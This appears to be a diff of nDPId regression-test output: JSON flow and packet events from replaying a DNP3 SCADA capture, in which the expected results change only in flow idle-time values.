-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1097507785883,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097507785883,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAaRAAIAG5RkKAAAICgAAAwQ+TiAMLRLKAAAAAHAC\/\/\/9vwAAAgQFtAEBBAI="} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097507785883,"flow_last_seen":1097507785885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097507785885,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097507785883,"flow_last_seen":1097507785883,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097507785883,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1097507785883,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097507785883,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAaRAAIAG5RkKAAAICgAAAwQ+TiAMLRLKAAAAAHAC\/\/\/9vwAAAgQFtAEBBAI="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1097507785883,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097507785883,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAaRAAIAG5RkKAAAICgAAAwQ+TiAMLRLKAAAAAHAC\/\/\/9vwAAAgQFtAEBBAI="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1097507785883,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097507785883,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAaRAAIAG5RkKAAAICgAAAwQ+TiAMLRLKAAAAAHAC\/\/\/9vwAAAgQFtAEBBAI="} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097507785883,"flow_last_seen":1097507785885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097507785885,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":445,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":445,"packets-processed":444,"total-skipped-flows":0,"total-l4-data-len":7101,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":5,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":33,"global_ts_msec":1097510947092} -00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097510947092,"flow_last_seen":1097510947092,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097510947092,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1097510947092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097510947092,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBZtAAIAG4SIKAAAICgAAAwSHTiCYpsdTAAAAAHAC\/\/+8cwAAAgQFtAEBBAI="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1097510947092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097510947092,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBZtAAIAG4SIKAAAICgAAAwSHTiCYpsdTAAAAAHAC\/\/+8cwAAAgQFtAEBBAI="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1097510947092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097510947092,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBZtAAIAG4SIKAAAICgAAAwSHTiCYpsdTAAAAAHAC\/\/+8cwAAAgQFtAEBBAI="} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097510947092,"flow_last_seen":1097510947094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097510947094,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097501938503,"flow_last_seen":1097502062040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1097510950374,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097510947092,"flow_last_seen":1097510947092,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097510947092,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1097510947092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097510947092,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBZtAAIAG4SIKAAAICgAAAwSHTiCYpsdTAAAAAHAC\/\/+8cwAAAgQFtAEBBAI="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1097510947092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097510947092,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBZtAAIAG4SIKAAAICgAAAwSHTiCYpsdTAAAAAHAC\/\/+8cwAAAgQFtAEBBAI="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1097510947092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097510947092,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBZtAAIAG4SIKAAAICgAAAwSHTiCYpsdTAAAAAHAC\/\/+8cwAAAgQFtAEBBAI="} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097510947092,"flow_last_seen":1097510947094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097510947094,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097501938503,"flow_last_seen":1097502062040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1097510950374,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":472,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":472,"packets-processed":471,"total-skipped-flows":0,"total-l4-data-len":7296,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":6,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":40,"global_ts_msec":1097512255234} -00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097512255234,"flow_last_seen":1097512255234,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097512255234,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1097512255234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097512255234,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBpNAAIAG4CoKAAAICgAAAwSgTiANrtDCAAAAAHAC\/\/895AAAAgQFtAEBBAI="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1097512255234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097512255234,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBpNAAIAG4CoKAAAICgAAAwSgTiANrtDCAAAAAHAC\/\/895AAAAgQFtAEBBAI="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1097512255234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097512255234,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBpNAAIAG4CoKAAAICgAAAwSgTiANrtDCAAAAAHAC\/\/895AAAAgQFtAEBBAI="} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097512255234,"flow_last_seen":1097512255236,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097512255236,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":496,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":138,"flow_first_seen":1097504102255,"flow_last_seen":1097504224083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":3417,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1097512264841,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097512255234,"flow_last_seen":1097512255234,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097512255234,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1097512255234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097512255234,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBpNAAIAG4CoKAAAICgAAAwSgTiANrtDCAAAAAHAC\/\/895AAAAgQFtAEBBAI="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1097512255234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097512255234,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBpNAAIAG4CoKAAAICgAAAwSgTiANrtDCAAAAAHAC\/\/895AAAAgQFtAEBBAI="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1097512255234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097512255234,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBpNAAIAG4CoKAAAICgAAAwSgTiANrtDCAAAAAHAC\/\/895AAAAgQFtAEBBAI="} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097512255234,"flow_last_seen":1097512255236,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097512255236,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":496,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":138,"flow_first_seen":1097504102255,"flow_last_seen":1097504224083,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":3417,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1097512264841,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":505,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":505,"packets-processed":504,"total-skipped-flows":0,"total-l4-data-len":7593,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":7,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":47,"global_ts_msec":1097513177295} -00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097513177295,"flow_last_seen":1097513177295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097513177295,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1097513177295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097513177295,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAUpAAIAG5XIKAAAJCgAAAwQ8TiBc3qwfAAAAAHAC\/\/8TugAAAgQFtAEBBAI="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1097513177295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097513177295,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAUpAAIAG5XIKAAAJCgAAAwQ8TiBc3qwfAAAAAHAC\/\/8TugAAAgQFtAEBBAI="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1097513177295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097513177295,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAUpAAIAG5XIKAAAJCgAAAwQ8TiBc3qwfAAAAAHAC\/\/8TugAAAgQFtAEBBAI="} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":514,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097513177295,"flow_last_seen":1097513177297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097513177297,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":135,"flow_first_seen":1097505644006,"flow_last_seen":1097506028601,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097513177295,"flow_last_seen":1097513185107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":93,"flow_first_seen":1097507785883,"flow_last_seen":1097507856257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1419,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1097510947092,"flow_last_seen":1097510959487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1097512255234,"flow_last_seen":1097512267645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097513177295,"flow_last_seen":1097513177295,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097513177295,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1097513177295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097513177295,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAUpAAIAG5XIKAAAJCgAAAwQ8TiBc3qwfAAAAAHAC\/\/8TugAAAgQFtAEBBAI="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1097513177295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097513177295,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAUpAAIAG5XIKAAAJCgAAAwQ8TiBc3qwfAAAAAHAC\/\/8TugAAAgQFtAEBBAI="} 